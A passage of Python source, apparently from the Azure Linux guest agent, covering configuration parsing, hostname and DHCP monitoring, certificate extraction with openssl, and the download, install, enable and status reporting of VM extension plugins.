balancing server, or this node may be shut-down. """ def __init__(self, port): self.ProbeCounter = 0 self.server = SocketServers.TCPServer((self.get_ip(), port), TCPHandler) self.server_thread = threading.Thread(target=self.server.serve_forever) self.server_thread.setDaemon(True) self.server_thread.start() def shutdown(self): self.server.shutdown() def get_ip(self): for retry in range(1, 6): ip = MyDistro.GetIpv4Address() if ip == None: Log("LoadBalancerProbeServer: GetIpv4Address() returned None, sleeping 10 before retry " + str( retry + 1)) time.sleep(10) else: return ip class ConfigurationProvider(object): """ Parse amd store key:values in waagent.conf """ def __init__(self, walaConfigFile): self.values = dict() if 'MyDistro' not in globals(): global MyDistro MyDistro = GetMyDistro() if walaConfigFile is None: walaConfigFile = MyDistro.getConfigurationPath() if os.path.isfile(walaConfigFile) == False: raise Exception("Missing configuration in {0}".format(walaConfigFile)) try: for line in GetFileContents(walaConfigFile).split('\n'): if not line.startswith("#") and "=" in line: parts = line.split()[0].split('=') value = parts[1].strip("\" ") if value != "None": self.values[parts[0]] = value else: self.values[parts[0]] = None except: Error("Unable to parse {0}".format(walaConfigFile)) raise return def get(self, key): return self.values.get(key) class EnvMonitor(object): """ Montor changes to dhcp and hostname. If dhcp clinet process re-start has occurred, reset routes, dhcp with fabric. """ def __init__(self): self.shutdown = False self.HostName = socket.gethostname() self.server_thread = threading.Thread(target=self.monitor) self.server_thread.setDaemon(True) self.server_thread.start() self.published = False def monitor(self): """ Monitor dhcp client pid and hostname. If dhcp clinet process re-start has occurred, reset routes, dhcp with fabric. 
""" publish = Config.get("Provisioning.MonitorHostName") dhcpcmd = MyDistro.getpidcmd + ' ' + MyDistro.getDhcpClientName() dhcppid = RunGetOutput(dhcpcmd)[1] while not self.shutdown: for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Log("EnvMonitor: Moved " + a + " -> " + LibDir) MyDistro.setScsiDiskTimeout() if publish != None and publish.lower().startswith("y"): try: if socket.gethostname() != self.HostName: Log("EnvMonitor: Detected host name change: " + self.HostName + " -> " + socket.gethostname()) self.HostName = socket.gethostname() WaAgent.UpdateAndPublishHostName(self.HostName) dhcppid = RunGetOutput(dhcpcmd)[1] self.published = True except: pass else: self.published = True pid = "" if not os.path.isdir("/proc/" + dhcppid.strip()): pid = RunGetOutput(dhcpcmd)[1] if pid != "" and pid != dhcppid: Log("EnvMonitor: Detected dhcp client restart. Restoring routing table.") WaAgent.RestoreRoutes() dhcppid = pid for child in Children: if child.poll() != None: Children.remove(child) time.sleep(5) def SetHostName(self, name): """ Generic call to MyDistro.setHostname(name). Complian to Log on error. """ if socket.gethostname() == name: self.published = True elif MyDistro.setHostname(name): Error("Error: SetHostName: Cannot set hostname to " + name) return ("Error: SetHostName: Cannot set hostname to " + name) def IsHostnamePublished(self): """ Return self.published """ return self.published def ShutdownService(self): """ Stop server comminucation and join the thread to main thread. """ self.shutdown = True self.server_thread.join() class Certificates(object): """ Object containing certificates of host and provisioned user. Parses and splits certificates into files. """ # <CertificateFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="certificates10.xsd"> # <Version>2010-12-15</Version> # <Incarnation>2</Incarnation> # <Format>Pkcs7BlobWithPfxContents</Format> # <Data>MIILTAY... # </Data> # </CertificateFile> def __init__(self): self.reinitialize() def reinitialize(self): """ Reset the Role, Incarnation """ self.Incarnation = None self.Role = None def Parse(self, xmlText): """ Parse multiple certificates into seperate files. """ self.reinitialize() SetFileContents("Certificates.xml", xmlText) dom = xml.dom.minidom.parseString(xmlText) for a in ["CertificateFile", "Version", "Incarnation", "Format", "Data", ]: if not dom.getElementsByTagName(a): Error("Certificates.Parse: Missing " + a) return None node = dom.childNodes[0] if node.localName != "CertificateFile": Error("Certificates.Parse: root not CertificateFile") return None SetFileContents("Certificates.p7m", "MIME-Version: 1.0\n" + "Content-Disposition: attachment; filename=\"Certificates.p7m\"\n" + "Content-Type: application/x-pkcs7-mime; name=\"Certificates.p7m\"\n" + "Content-Transfer-Encoding: base64\n\n" + GetNodeTextData(dom.getElementsByTagName("Data")[0])) if Run( Openssl + " cms -decrypt -in Certificates.p7m -inkey TransportPrivate.pem -recip TransportCert.pem | " + Openssl + " pkcs12 -nodes -password pass: -out Certificates.pem"): Error("Certificates.Parse: Failed to extract certificates from CMS message.") return self # There may be multiple certificates in this package. Split them. 
file = open("Certificates.pem") pindex = 1 cindex = 1 output = open("temp.pem", "w") for line in file.readlines(): output.write(line) if re.match(r'[-]+END .*?(KEY|CERTIFICATE)[-]+$', line): output.close() if re.match(r'[-]+END .*?KEY[-]+$', line): os.rename("temp.pem", str(pindex) + ".prv") pindex += 1 else: os.rename("temp.pem", str(cindex) + ".crt") cindex += 1 output = open("temp.pem", "w") output.close() os.remove("temp.pem") keys = dict() index = 1 filename = str(index) + ".crt" while os.path.isfile(filename): thumbprint = \ (RunGetOutput(Openssl + " x509 -in " + filename + " -fingerprint -noout")[1]).rstrip().split('=')[ 1].replace(':', '').upper() pubkey = RunGetOutput(Openssl + " x509 -in " + filename + " -pubkey -noout")[1] keys[pubkey] = thumbprint os.rename(filename, thumbprint + ".crt") os.chmod(thumbprint + ".crt", 0o600) MyDistro.setSelinuxContext(thumbprint + '.crt', 'unconfined_u:object_r:ssh_home_t:s0') index += 1 filename = str(index) + ".crt" index = 1 filename = str(index) + ".prv" while os.path.isfile(filename): pubkey = RunGetOutput(Openssl + " rsa -in " + filename + " -pubout 2> /dev/null ")[1] os.rename(filename, keys[pubkey] + ".prv") os.chmod(keys[pubkey] + ".prv", 0o600) MyDistro.setSelinuxContext(keys[pubkey] + '.prv', 'unconfined_u:object_r:ssh_home_t:s0') index += 1 filename = str(index) + ".prv" return self class ExtensionsConfig(object): """ Parse ExtensionsConfig, downloading and unpacking them to /var/lib/waagent. Install if <enabled>true</enabled>, remove if it is set to false. """ # <?xml version="1.0" encoding="utf-8"?> # <Extensions version="1.0.0.0" goalStateIncarnation="6"><Plugins> # <Plugin name="OSTCExtensions.ExampleHandlerLinux" version="1.5" # location="http://previewusnorthcache.blob.core.test-cint.azure-test.net/d84b216d00bf4d96982be531539e1513/OSTCExtensions_ExampleHandlerLinux_usnorth_manifest.xml" # config="" state="enabled" autoUpgrade="false" runAsStartupTask="false" isJson="true" /> # </Plugins> # <PluginSettings> # <Plugin name="OSTCExtensions.ExampleHandlerLinux" version="1.5"> # <RuntimeSettings seqNo="2">{"runtimeSettings":[{"handlerSettings":{"protectedSettingsCertThumbprint":"1BE9A13AA1321C7C515EF109746998BAB6D86FD1", # "protectedSettings":"MIIByAYJKoZIhvcNAQcDoIIBuTCCAbUCAQAxggFxMIIBbQIBADBVMEExPzA9BgoJkiaJk/IsZAEZFi9XaW5kb3dzIEF6dXJlIFNlcnZpY2UgTWFuYWdlbWVudCBmb3IgR # Xh0ZW5zaW9ucwIQZi7dw+nhc6VHQTQpCiiV2zANBgkqhkiG9w0BAQEFAASCAQCKr09QKMGhwYe+O4/a8td+vpB4eTR+BQso84cV5KCAnD6iUIMcSYTrn9aveY6v6ykRLEw8GRKfri2d6 # tvVDggUrBqDwIgzejGTlCstcMJItWa8Je8gHZVSDfoN80AEOTws9Fp+wNXAbSuMJNb8EnpkpvigAWU2v6pGLEFvSKC0MCjDTkjpjqciGMcbe/r85RG3Zo21HLl0xNOpjDs/qqikc/ri43Y76E/X # v1vBSHEGMFprPy/Hwo3PqZCnulcbVzNnaXN3qi/kxV897xGMPPC3IrO7Nc++AT9qRLFI0841JLcLTlnoVG1okPzK9w6ttksDQmKBSHt3mfYV+skqs+EOMDsGCSqGSIb3DQEHATAUBggqh # kiG9w0DBwQITgu0Nu3iFPuAGD6/QzKdtrnCI5425fIUy7LtpXJGmpWDUA==","publicSettings":{"port":"3000"}}}]}</RuntimeSettings> # </Plugin> # </PluginSettings> def __init__(self): self.reinitialize() def reinitialize(self): """ Reset members. """ self.Extensions = None self.Plugins = None self.Util = None def Parse(self, xmlText): """ Write configuration to file ExtensionsConfig.xml. Log plugin specific activity to /var/log/azure/<Publisher>.<PluginName>/<Version>/CommandExecution.log. If state is enabled: if the plugin is installed: if the new plugin's version is higher if DisallowMajorVersionUpgrade is false or if true, the version is a minor version do upgrade: download the new archive do the updateCommand. 
disable the old plugin and remove enable the new plugin if the new plugin's version is the same or lower: create the new .settings file from the configuration received do the enableCommand if the plugin is not installed: download/unpack archive and call the installCommand/Enable if state is disabled: call disableCommand if state is uninstall: call uninstallCommand remove old plugin directory. """ self.reinitialize() self.Util = Util() dom = xml.dom.minidom.parseString(xmlText) LogIfVerbose(xmlText) self.plugin_log_dir = '/var/log/azure' if not os.path.exists(self.plugin_log_dir): os.mkdir(self.plugin_log_dir) try: self.Extensions = dom.getElementsByTagName("Extensions") pg = dom.getElementsByTagName("Plugins") if len(pg) > 0: self.Plugins = pg[0].getElementsByTagName("Plugin") else: self.Plugins = [] incarnation = self.Extensions[0].getAttribute("goalStateIncarnation") SetFileContents('ExtensionsConfig.' + incarnation + '.xml', xmlText) except Exception as e: Error('ERROR: Error parsing ExtensionsConfig: {0}.'.format(e)) return None for p in self.Plugins: if len(p.getAttribute("location")) < 1: # this plugin is inside the PluginSettings continue p.setAttribute('restricted', 'false') previous_version = None version = p.getAttribute("version") name = p.getAttribute("name") plog_dir = self.plugin_log_dir + '/' + name + '/' + version if not os.path.exists(plog_dir): os.makedirs(plog_dir) p.plugin_log = plog_dir + '/CommandExecution.log' handler = name + '-' + version if p.getAttribute("isJson") != 'true': Error("Plugin " + name + " version: " + version + " is not a JSON Extension. Skipping.") continue Log("Found Plugin: " + name + ' version: ' + version) if p.getAttribute("state") == 'disabled' or p.getAttribute("state") == 'uninstall': # disable zip_dir = LibDir + "/" + name + '-' + version mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) if self.launchCommand(p.plugin_log, name, version, 'disableCommand') == None: self.SetHandlerState(handler, 'Enabled') Error('Unable to disable ' + name) SimpleLog(p.plugin_log, 'ERROR: Unable to disable ' + name) else: self.SetHandlerState(handler, 'Disabled') Log(name + ' is disabled') SimpleLog(p.plugin_log, name + ' is disabled') # uninstall if needed if p.getAttribute("state") == 'uninstall': if self.launchCommand(p.plugin_log, name, version, 'uninstallCommand') == None: self.SetHandlerState(handler, 'Installed') Error('Unable to uninstall ' + name) SimpleLog(p.plugin_log, 'Unable to uninstall ' + name) else: self.SetHandlerState(handler, 'NotInstalled') Log(name + ' uninstallCommand completed .') # remove the plugin Run('rm -rf ' + LibDir + '/' + name + '-' + version + '*') Log(name + '-' + version + ' extension files deleted.') SimpleLog(p.plugin_log, name + '-' + version + ' extension files deleted.') continue # state is enabled # if the same plugin exists and the version is newer or # does not exist then download and unzip the new plugin plg_dir = None latest_version_installed = LooseVersion("0.0") for item in os.listdir(LibDir): itemPath = os.path.join(LibDir, item) if os.path.isdir(itemPath) and name in item: try: # Split plugin dir name with '-' to get intalled plugin name and version sperator = item.rfind('-') if sperator < 0: continue installed_plg_name = item[0:sperator] installed_plg_version = 
LooseVersion(item[sperator + 1:]) # Check installed plugin name and compare installed version to get the latest version installed if installed_plg_name == name and installed_plg_version > latest_version_installed: plg_dir = itemPath previous_version = str(installed_plg_version) latest_version_installed = installed_plg_version except Exception as e: Warn("Invalid plugin dir name: {0} {1}".format(item, e)) continue if plg_dir == None or LooseVersion(version) > LooseVersion(previous_version): location = p.getAttribute("location") Log("Downloading plugin manifest: " + name + " from " + location) SimpleLog(p.plugin_log, "Downloading plugin manifest: " + name + " from " + location) self.Util.Endpoint = location.split('/')[2] Log("Plugin server is: " + self.Util.Endpoint) SimpleLog(p.plugin_log, "Plugin server is: " + self.Util.Endpoint) manifest = self.Util.HttpGetWithoutHeaders(location, chkProxy=True) if manifest == None: Error( "Unable to download plugin manifest" + name + " from primary location. Attempting with failover location.") SimpleLog(p.plugin_log, "Unable to download plugin manifest" + name + " from primary location. Attempting with failover location.") failoverlocation = p.getAttribute("failoverlocation") self.Util.Endpoint = failoverlocation.split('/')[2] Log("Plugin failover server is: " + self.Util.Endpoint) SimpleLog(p.plugin_log, "Plugin failover server is: " + self.Util.Endpoint) manifest = self.Util.HttpGetWithoutHeaders(failoverlocation, chkProxy=True) # if failoverlocation also fail what to do then? if manifest == None: AddExtensionEvent(name, WALAEventOperation.Download, False, 0, version, "Download mainfest fail " + failoverlocation) Log("Plugin manifest " + name + " downloading failed from failover location.") SimpleLog(p.plugin_log, "Plugin manifest " + name + " downloading failed from failover location.") filepath = LibDir + "/" + name + '.' 
+ incarnation + '.manifest' if os.path.splitext(location)[-1] == '.xml': # if this is an xml file we may have a BOM if ord(manifest[0]) > 128 and ord(manifest[1]) > 128 and ord(manifest[2]) > 128: manifest = manifest[3:] SetFileContents(filepath, manifest) # Get the bundle url from the manifest p.setAttribute('manifestdata', manifest) man_dom = xml.dom.minidom.parseString(manifest) bundle_uri = "" for mp in man_dom.getElementsByTagName("Plugin"): if GetNodeTextData(mp.getElementsByTagName("Version")[0]) == version: bundle_uri = GetNodeTextData(mp.getElementsByTagName("Uri")[0]) break if len(mp.getElementsByTagName("DisallowMajorVersionUpgrade")): if GetNodeTextData(mp.getElementsByTagName("DisallowMajorVersionUpgrade")[ 0]) == 'true' and previous_version != None and previous_version.split('.')[ 0] != version.split('.')[0]: Log('DisallowMajorVersionUpgrade is true, this major version is restricted from upgrade.') SimpleLog(p.plugin_log, 'DisallowMajorVersionUpgrade is true, this major version is restricted from upgrade.') p.setAttribute('restricted', 'true') continue if len(bundle_uri) < 1: Error("Unable to fetch Bundle URI from manifest for " + name + " v " + version) SimpleLog(p.plugin_log, "Unable to fetch Bundle URI from manifest for " + name + " v " + version) continue Log("Bundle URI = " + bundle_uri) SimpleLog(p.plugin_log, "Bundle URI = " + bundle_uri) # Download the zipfile archive and save as '.zip' bundle = self.Util.HttpGetWithoutHeaders(bundle_uri, chkProxy=True) if bundle == None: AddExtensionEvent(name, WALAEventOperation.Download, True, 0, version, "Download zip fail " + bundle_uri) Error("Unable to download plugin bundle" + bundle_uri) SimpleLog(p.plugin_log, "Unable to download plugin bundle" + bundle_uri) continue AddExtensionEvent(name, WALAEventOperation.Download, True, 0, version, "Download Success") b = bytearray(bundle) filepath = LibDir + "/" + os.path.basename(bundle_uri) + '.zip' SetFileContents(filepath, b) Log("Plugin bundle" + bundle_uri + "downloaded successfully length = " + str(len(bundle))) SimpleLog(p.plugin_log, "Plugin bundle" + bundle_uri + "downloaded successfully length = " + str(len(bundle))) # unpack the archive z = zipfile.ZipFile(filepath) zip_dir = LibDir + "/" + name + '-' + version z.extractall(zip_dir) Log('Extracted ' + bundle_uri + ' to ' + zip_dir) SimpleLog(p.plugin_log, 'Extracted ' + bundle_uri + ' to ' + zip_dir) # zip no file perms in .zip so set all the scripts to +x Run("find " + zip_dir + " -type f | xargs chmod u+x ") # write out the base64 config data so the plugin can process it. mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(p.plugin_log, 'HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) # create the status and config dirs Run('mkdir -p ' + root + '/status') Run('mkdir -p ' + root + '/config') # write out the configuration data to goalStateIncarnation.settings file in the config path. 
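                # Illustrative sketch of the on-disk layout this block produces for a hypothetical
                # handler 'Example.Handler' version '1.0' with seqNo '0' (LibDir is typically
                # /var/lib/waagent, but the exact value comes from configuration elsewhere):
                #     <LibDir>/Example.Handler-1.0/config/0.settings        <- RuntimeSettings written below
                #     <LibDir>/Example.Handler-1.0/status/                  <- handler reports 0.status here
                #     <LibDir>/Example.Handler-1.0/HandlerEnvironment.json  <- folder paths handed to the handler
                # The settings file is named after the sequence number, so a newer goal state lands in a new file.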
config = '' seqNo = '0' if len(dom.getElementsByTagName("PluginSettings")) != 0: pslist = dom.getElementsByTagName("PluginSettings")[0].getElementsByTagName("Plugin") for ps in pslist: if name == ps.getAttribute("name") and version == ps.getAttribute("version"): Log("Found RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "Found RuntimeSettings for " + name + " V " + version) config = GetNodeTextData(ps.getElementsByTagName("RuntimeSettings")[0]) seqNo = ps.getElementsByTagName("RuntimeSettings")[0].getAttribute("seqNo") break if config == '': Log("No RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "No RuntimeSettings for " + name + " V " + version) SetFileContents(root + "/config/" + seqNo + ".settings", config) # create HandlerEnvironment.json handler_env = '[{ "name": "' + name + '", "seqNo": "' + seqNo + '", "version": 1.0, "handlerEnvironment": { "logFolder": "' + os.path.dirname( p.plugin_log) + '", "configFolder": "' + root + '/config", "statusFolder": "' + root + '/status", "heartbeatFile": "' + root + '/heartbeat.log"}}]' SetFileContents(root + '/HandlerEnvironment.json', handler_env) self.SetHandlerState(handler, 'NotInstalled') cmd = '' getcmd = 'installCommand' if plg_dir != None and previous_version != None and LooseVersion(version) > LooseVersion( previous_version): previous_handler = name + '-' + previous_version if self.GetHandlerState(previous_handler) != 'NotInstalled': getcmd = 'updateCommand' # disable the old plugin if it exists if self.launchCommand(p.plugin_log, name, previous_version, 'disableCommand') == None: self.SetHandlerState(previous_handler, 'Enabled') Error('Unable to disable old plugin ' + name + ' version ' + previous_version) SimpleLog(p.plugin_log, 'Unable to disable old plugin ' + name + ' version ' + previous_version) else: self.SetHandlerState(previous_handler, 'Disabled') Log(name + ' version ' + previous_version + ' is disabled') SimpleLog(p.plugin_log, name + ' version ' + previous_version + ' is disabled') try: Log("Copy status file from old plugin dir to new") old_plg_dir = plg_dir new_plg_dir = os.path.join(LibDir, "{0}-{1}".format(name, version)) old_ext_status_dir = os.path.join(old_plg_dir, "status") new_ext_status_dir = os.path.join(new_plg_dir, "status") if os.path.isdir(old_ext_status_dir): for status_file in os.listdir(old_ext_status_dir): status_file_path = os.path.join(old_ext_status_dir, status_file) if os.path.isfile(status_file_path): shutil.copy2(status_file_path, new_ext_status_dir) mrseq_file = os.path.join(old_plg_dir, "mrseq") if os.path.isfile(mrseq_file): shutil.copy(mrseq_file, new_plg_dir) except Exception as e: Error("Failed to copy status file.") isupgradeSuccess = True if getcmd == 'updateCommand': if self.launchCommand(p.plugin_log, name, version, getcmd, previous_version) == None: Error('Update failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Update failed for ' + name + '-' + version) isupgradeSuccess = False else: Log('Update complete' + name + '-' + version) SimpleLog(p.plugin_log, 'Update complete' + name + '-' + version) # if we updated - call unistall for the old plugin if self.launchCommand(p.plugin_log, name, previous_version, 'uninstallCommand') == None: self.SetHandlerState(previous_handler, 'Installed') Error('Uninstall failed for ' + name + '-' + previous_version) SimpleLog(p.plugin_log, 'Uninstall failed for ' + name + '-' + previous_version) isupgradeSuccess = False else: self.SetHandlerState(previous_handler, 'NotInstalled') Log('Uninstall 
complete' + previous_handler) SimpleLog(p.plugin_log, 'Uninstall complete' + name + '-' + previous_version) try: # rm old plugin dir if os.path.isdir(plg_dir): shutil.rmtree(plg_dir) Log(name + '-' + previous_version + ' extension files deleted.') SimpleLog(p.plugin_log, name + '-' + previous_version + ' extension files deleted.') except Exception as e: Error("Failed to remove old plugin directory") AddExtensionEvent(name, WALAEventOperation.Upgrade, isupgradeSuccess, 0, previous_version) else: # run install if self.launchCommand(p.plugin_log, name, version, getcmd) == None: self.SetHandlerState(handler, 'NotInstalled') Error('Installation failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Installed') Log('Installation completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation completed for ' + name + '-' + version) # end if plg_dir == none or version > = prev # change incarnation of settings file so it knows how to name status... zip_dir = LibDir + "/" + name + '-' + version mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(p.plugin_log, 'HandlerManifest.json not found.') continue manifest = GetFileContents(mfile) p.setAttribute('manifestdata', manifest) config = '' seqNo = '0' if len(dom.getElementsByTagName("PluginSettings")) != 0: try: pslist = dom.getElementsByTagName("PluginSettings")[0].getElementsByTagName("Plugin") except: Error('Error parsing ExtensionsConfig.') SimpleLog(p.plugin_log, 'Error parsing ExtensionsConfig.') continue for ps in pslist: if name == ps.getAttribute("name") and version == ps.getAttribute("version"): Log("Found RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "Found RuntimeSettings for " + name + " V " + version) config = GetNodeTextData(ps.getElementsByTagName("RuntimeSettings")[0]) seqNo = ps.getElementsByTagName("RuntimeSettings")[0].getAttribute("seqNo") break if config == '': Error("No RuntimeSettings for " + name + " V " + version) SimpleLog(p.plugin_log, "No RuntimeSettings for " + name + " V " + version) SetFileContents(root + "/config/" + seqNo + ".settings", config) # state is still enable if (self.GetHandlerState(handler) == 'NotInstalled'): # run install first if true if self.launchCommand(p.plugin_log, name, version, 'installCommand') == None: self.SetHandlerState(handler, 'NotInstalled') Error('Installation failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Installed') Log('Installation completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Installation completed for ' + name + '-' + version) if (self.GetHandlerState(handler) != 'NotInstalled'): if self.launchCommand(p.plugin_log, name, version, 'enableCommand') == None: self.SetHandlerState(handler, 'Installed') Error('Enable failed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Enable failed for ' + name + '-' + version) else: self.SetHandlerState(handler, 'Enabled') Log('Enable completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Enable completed for ' + name + '-' + version) # this plugin processing is complete Log('Processing completed for ' + name + '-' + version) SimpleLog(p.plugin_log, 'Processing completed for ' + name + '-' + version) # end 
plugin processing loop Log('Finished processing ExtensionsConfig.xml') try: SimpleLog(p.plugin_log, 'Finished processing ExtensionsConfig.xml') except: pass return self def launchCommand(self, plugin_log, name, version, command, prev_version=None): commandToEventOperation = { "installCommand": WALAEventOperation.Install, "uninstallCommand": WALAEventOperation.UnIsntall, "updateCommand": WALAEventOperation.Upgrade, "enableCommand": WALAEventOperation.Enable, "disableCommand": WALAEventOperation.Disable, } isSuccess = True start = datetime.datetime.now() r = self.__launchCommandWithoutEventLog(plugin_log, name, version, command, prev_version) if r == None: isSuccess = False Duration = int((datetime.datetime.now() - start).seconds) if commandToEventOperation.get(command): AddExtensionEvent(name, commandToEventOperation[command], isSuccess, Duration, version) return r def __launchCommandWithoutEventLog(self, plugin_log, name, version, command, prev_version=None): # get the manifest and read the command mfile = None zip_dir = LibDir + "/" + name + '-' + version for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('HandlerManifest.json not found.') SimpleLog(plugin_log, 'HandlerManifest.json not found.') return None manifest = GetFileContents(mfile) try: jsn = json.loads(manifest) except: Error('Error parsing HandlerManifest.json.') SimpleLog(plugin_log, 'Error parsing HandlerManifest.json.') return None if type(jsn) == list: jsn = jsn[0] if jsn.has_key('handlerManifest'): cmd = jsn['handlerManifest'][command] else: Error('Key handlerManifest not found. Handler cannot be installed.') SimpleLog(plugin_log, 'Key handlerManifest not found. Handler cannot be installed.') if len(cmd) == 0: Error('Unable to read ' + command) SimpleLog(plugin_log, 'Unable to read ' + command) return None # for update we send the path of the old installation arg = '' if prev_version != None: arg = ' ' + LibDir + '/' + name + '-' + prev_version dirpath = os.path.dirname(mfile) LogIfVerbose('Command is ' + dirpath + '/' + cmd) # launch pid = None try: child = subprocess.Popen(dirpath + '/' + cmd + arg, shell=True, cwd=dirpath, stdout=subprocess.PIPE) except Exception as e: Error('Exception launching ' + cmd + str(e)) SimpleLog(plugin_log, 'Exception launching ' + cmd + str(e)) pid = child.pid if pid == None or pid < 1: ExtensionChildren.append((-1, root)) Error('Error launching ' + cmd + '.') SimpleLog(plugin_log, 'Error launching ' + cmd + '.') else: ExtensionChildren.append((pid, root)) Log("Spawned " + cmd + " PID " + str(pid)) SimpleLog(plugin_log, "Spawned " + cmd + " PID " + str(pid)) # wait until install/upgrade is finished timeout = 300 # 5 minutes retry = timeout / 5 while retry > 0 and child.poll() == None: LogIfVerbose(cmd + ' still running with PID ' + str(pid)) time.sleep(5) retry -= 1 if retry == 0: Error('Process exceeded timeout of ' + str(timeout) + ' seconds. Terminating process ' + str(pid)) SimpleLog(plugin_log, 'Process exceeded timeout of ' + str(timeout) + ' seconds. 
Terminating process ' + str(pid)) os.kill(pid, 9) return None code = child.wait() if code == None or code != 0: Error('Process ' + str(pid) + ' returned non-zero exit code (' + str(code) + ')') SimpleLog(plugin_log, 'Process ' + str(pid) + ' returned non-zero exit code (' + str(code) + ')') return None Log(command + ' completed.') SimpleLog(plugin_log, command + ' completed.') return 0 def ReportHandlerStatus(self): """ Collect all status reports. """ # { "version": "1.0", "timestampUTC": "2014-03-31T21:28:58Z", # "aggregateStatus": { # "guestAgentStatus": { "version": "2.0.4PRE", "status": "Ready", "formattedMessage": { "lang": "en-US", "message": "GuestAgent is running and accepting new configurations." } }, # "handlerAggregateStatus": [{ # "handlerName": "ExampleHandlerLinux", "handlerVersion": "1.0", "status": "Ready", "runtimeSettingsStatus": { # "sequenceNumber": "2", "settingsStatus": { "timestampUTC": "2014-03-31T23:46:00Z", "status": { "name": "ExampleHandlerLinux", "operation": "Command Execution Finished", "configurationAppliedTime": "2014-03-31T23:46:00Z", "status": "success", "formattedMessage": { "lang": "en-US", "message": "Finished executing command" }, # "substatus": [ # { "name": "StdOut", "status": "success", "formattedMessage": { "lang": "en-US", "message": "Goodbye world!" } }, # { "name": "StdErr", "status": "success", "formattedMessage": { "lang": "en-US", "message": "" } } # ] # } } } } # ] # }} try: incarnation = self.Extensions[0].getAttribute("goalStateIncarnation") except: Error('Error parsing attribute "goalStateIncarnation". Unable to send status reports') return -1 status = '' statuses = '' for p in self.Plugins: if p.getAttribute("state") == 'uninstall' or p.getAttribute("restricted") == 'true': continue version = p.getAttribute("version") name = p.getAttribute("name") if p.getAttribute("isJson") != 'true': LogIfVerbose("Plugin " + name + " version: " + version + " is not a JSON Extension. Skipping.") continue reportHeartbeat = False if len(p.getAttribute("manifestdata")) < 1: Error("Failed to get manifestdata.") else: reportHeartbeat = json.loads(p.getAttribute("manifestdata"))[0]['handlerManifest']['reportHeartbeat'] if len(statuses) > 0: statuses += ',' statuses += self.GenerateAggStatus(name, version, reportHeartbeat) tstamp = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()) # header # agent state if provisioned == False: if provisionError == None: agent_state = 'Provisioning' agent_msg = 'Guest Agent is starting.' else: agent_state = 'Provisioning Error.' agent_msg = provisionError else: agent_state = 'Ready' agent_msg = 'GuestAgent is running and accepting new configurations.' status = '{"version":"1.0","timestampUTC":"' + tstamp + '","aggregateStatus":{"guestAgentStatus":{"version":"' + GuestAgentVersion + '","status":"' + agent_state + '","formattedMessage":{"lang":"en-US","message":"' + agent_msg + '"}},"handlerAggregateStatus":[' + statuses + ']}}' try: uri = GetNodeTextData(self.Extensions[0].getElementsByTagName("StatusUploadBlob")[0]).replace('&amp;', '&') except: Error('Error parsing element "StatusUploadBlob". 
Unable to send status reports') return -1 LogIfVerbose('Status report ' + status + ' sent to ' + uri) return UploadStatusBlob(uri, status.encode("utf-8")) def GetCurrentSequenceNumber(self, plugin_base_dir): """ Get the settings file with biggest file number in config folder """ config_dir = os.path.join(plugin_base_dir, 'config') seq_no = 0 for subdir, dirs, files in os.walk(config_dir): for file in files: try: cur_seq_no = int(os.path.basename(file).split('.')[0]) if cur_seq_no > seq_no: seq_no = cur_seq_no except ValueError: continue return str(seq_no) def GenerateAggStatus(self, name, version, reportHeartbeat=False): """ Generate the status which Azure can understand by the status and heartbeat reported by extension """ plugin_base_dir = LibDir + '/' + name + '-' + version + '/' current_seq_no = self.GetCurrentSequenceNumber(plugin_base_dir) status_file = os.path.join(plugin_base_dir, 'status/', current_seq_no + '.status') heartbeat_file = os.path.join(plugin_base_dir, 'heartbeat.log') handler_state_file = os.path.join(plugin_base_dir, 'config', 'HandlerState') agg_state = 'NotReady' handler_state = None status_obj = None status_code = None formatted_message = None localized_message = None if os.path.exists(handler_state_file): handler_state = GetFileContents(handler_state_file).lower() if HandlerStatusToAggStatus.has_key(handler_state): agg_state = HandlerStatusToAggStatus[handler_state] if reportHeartbeat: if os.path.exists(heartbeat_file): d = int(time.time() - os.stat(heartbeat_file).st_mtime) if d > 600: # not updated for more than 10 min agg_state = 'Unresponsive' else: try: heartbeat = json.loads(GetFileContents(heartbeat_file))[0]["heartbeat"] agg_state = heartbeat.get("status") status_code = heartbeat.get("code") formatted_message = heartbeat.get("formattedMessage") localized_message = heartbeat.get("message") except: Error("Incorrect heartbeat file. Ignore it. ") else: agg_state = 'Unresponsive' # get status file reported by extension if os.path.exists(status_file): # raw status generated by extension is an array, get the first item and remove the unnecessary element try: status_obj = json.loads(GetFileContents(status_file))[0] del status_obj["version"] except: Error("Incorrect status file. Will NOT settingsStatus in settings. 
